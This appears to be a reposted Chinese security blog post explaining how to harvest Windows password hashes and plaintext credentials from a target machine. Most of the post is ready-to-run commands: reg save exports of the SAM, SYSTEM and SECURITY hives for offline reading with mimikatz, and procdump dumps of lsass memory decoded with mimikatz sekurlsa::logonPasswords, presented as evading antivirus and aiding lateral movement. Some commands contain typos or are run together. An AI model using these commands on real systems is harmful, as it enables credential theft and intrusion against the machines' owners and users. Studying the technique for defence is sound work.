文章总结： 本文介绍了两种本地获取目标机器凭证Hash及明文的方法。一是通过reg命令导出注册表SAM、SYSTEM及SECURITY文件，利用mimikatz离线读取哈希；二是使用procdump导出lsass进程内存，下载后通过mimikatz解密获取明文密码。这些技巧适用于渗透测试阶段的权限维持与横向移动。 综合评分： 80 文章分类： 渗透测试,红队,内网渗透

本地抓取目的机hash密码

原创

小白鱼来了

Joker One Security

2026年1月3日 20:25 新加坡

/*本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。*/

minikatz离线抓取

注册表导出

利用下面的命令将注册表导出来

reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
reg save HKLM\SECURITY sercrity.hiv

执行后会在你运行位置的目录存放,比如：

然后将这两个文件与minikatz放在同一目录，执行以下命令

mimikatz.exe
lsadump::sam /sam:sam.hiv /system:system.hiv /sercrity:sercrity.hiv

dump lsass.exe 进程数据离线免杀抓取明文

32位机器：procdump.exe -accepteula -ma lsass.exe lsass.dmp    64位机器：procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

下载到本地利用minikatz进行解密

mimikatz.exesekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Joker One Security 小白鱼来了《本地抓取目的机hash密码》